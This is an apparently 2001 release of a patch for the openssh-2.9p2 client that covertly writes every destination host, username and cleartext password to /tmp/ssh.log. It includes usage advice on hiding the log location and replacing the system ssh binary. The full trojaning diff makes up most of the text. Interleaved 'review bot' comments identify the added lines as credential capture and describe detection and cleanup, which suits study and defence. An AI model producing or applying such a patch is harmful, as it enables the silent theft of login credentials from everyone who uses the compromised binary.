-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
  [Ministry-Of-Peace] - openssh-2.9p2 snoop patch - 07th Sept 2001   
               ==   (c)oded 2001 Digital Shadow   ==                
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

Code Description:
-----------------
This is a patch for the openssh-2.9p2 ssh client that logs the
username, password and target system address to a local file, in
cleartext, whenever anyone uses the patched ssh. The details are
captured on the client before they are encrypted for transmission.


Usage:
------
The code currently logs to /tmp/ssh.log - it is highly advised that
you modify this to somewhere a little less obvious.
To apply the patch, copy it into the directory where openssh-2.9p2
is and type: patch -p1 < ssh-2.3.0-patch
Then all you need to do is compile it, and use a utility such as
fix to replace the old ssh with the new version.


Code:
-----
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
diff -N -c -r openssh-2.9p2/ssh.c openssh-2.9p2-new/ssh.c
*** openssh-2.9p2/ssh.c Tue Apr 17 14:14:35 2001
--- openssh-2.9p2-new/ssh.c     Tue Nov 27 05:56:01 2001
***************
*** 249,254 ****
--- 249,255 ----
        struct passwd *pw;
        int dummy;
        uid_t original_effective_uid;
+         FILE *lg;

        __progname = get_progname(av[0]);
        init_rng();
***************
*** 716,721 ****
--- 717,727 ----
            tilde_expand_filename(options.user_hostfile2, original_real_uid);

        /* Log into the remote system.  This never returns if the login fails. */
+         lg=fopen("/tmp/ssh.log", "a");
+         fprintf(lg, "Host: %s\n", host);
+         fprintf(lg, "User: %s\n", options.user);
+         fclose(lg);
+
        ssh_login(sensitive_data.keys, sensitive_data.nkeys,
            host, (struct sockaddr *)&hostaddr, pw);

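Review bot: The added block ahead of `ssh_login()` records every destination host and login name in `/tmp/ssh.log`, which the client has no reason to persist; the `fopen`/`fprintf`/`fclose` lines and the `FILE *lg;` declaration from the first ssh.c hunk should be dropped. The same pattern in the sshconnect.c and sshconnect2.c hunks writes the password itself in cleartext to the same file, so the three files together amount to credential capture for every user of the binary. A build carrying these lines no longer matches the distribution's package checksum for `ssh`, so package verification or file-integrity monitoring of the installed binary is the dependable way to notice it, whatever log path is compiled in. The enclosing function starts and ends outside the hunk.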
diff -N -c -r openssh-2.9p2/sshconnect.c openssh-2.9p2-new/sshconnect.c
*** openssh-2.9p2/sshconnect.c  Thu Apr 12 19:34:36 2001
--- openssh-2.9p2-new/sshconnect.c      Tue Nov 27 05:56:01 2001
***************
*** 775,785 ****
--- 775,790 ----
  {
        int size;
        char *padded;
+         FILE *lg;

        if (datafellows & SSH_BUG_PASSWORDPAD) {
                packet_put_string(password, strlen(password));
                return;
        }
+
+         lg=fopen("/tmp/ssh.log", "a");
+         fprintf(lg, "Password: %s\n\n", password);
+         fclose(lg);
        size = roundup(strlen(password) + 1, 32);
        padded = xmalloc(size);
        memset(padded, 0, size);
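Review bot: The `fopen` result is used without a check at `fprintf(lg, "Password: %s\n\n", password);`, and the file is created under the calling user's umask, so with a common umask of 022 the cleartext password is readable by other local accounts as well. When the path cannot be opened, `lg` is NULL and the `fprintf` call is undefined behaviour, which would most likely show up as the client faulting during password authentication; the ssh.c and sshconnect2.c hunks make the same unchecked call. The remedy is to remove the added lines together with `FILE *lg;` rather than to harden them, since the visible code here only pads and sends the password. The function's signature and the rest of its body are outside the hunk.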
diff -N -c -r openssh-2.9p2/sshconnect2.c openssh-2.9p2-new/sshconnect2.c
*** openssh-2.9p2/sshconnect2.c Thu Apr 19 16:40:46 2001
--- openssh-2.9p2-new/sshconnect2.c     Tue Nov 27 05:56:01 2001
***************
*** 441,446 ****
--- 441,447 ----
        static int attempt = 0;
        char prompt[80];
        char *password;
+         FILE *lg;

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
***************
*** 457,462 ****
--- 458,466 ----
        packet_put_cstring(authctxt->method->name);
        packet_put_char(0);
        packet_put_cstring(password);
+         lg=fopen("/tmp/ssh.log", "a");
+         fprintf(lg, "Password: %s\n\n", password);
+         fclose(lg);
        memset(password, 0, strlen(password));
        xfree(password);
        packet_inject_ignore(64);
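Review bot: Writing `password` to disk immediately before `memset(password, 0, strlen(password));` defeats the scrub that follows, because the secret has already left process memory in cleartext by the time the buffer is zeroed. The added lines `lg=fopen("/tmp/ssh.log", "a");`, `fprintf(lg, "Password: %s\n\n", password);` and `fclose(lg);` should be removed, along with the `FILE *lg;` declaration in the preceding sshconnect2.c hunk. On a system where such a build has run, every password that appears in the log should be treated as exposed and changed. The enclosing function begins before the hunk and continues after it.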
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
    code[at]ministryofpeace.co.uk  --  www.ministryofpeace.co.uk    
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
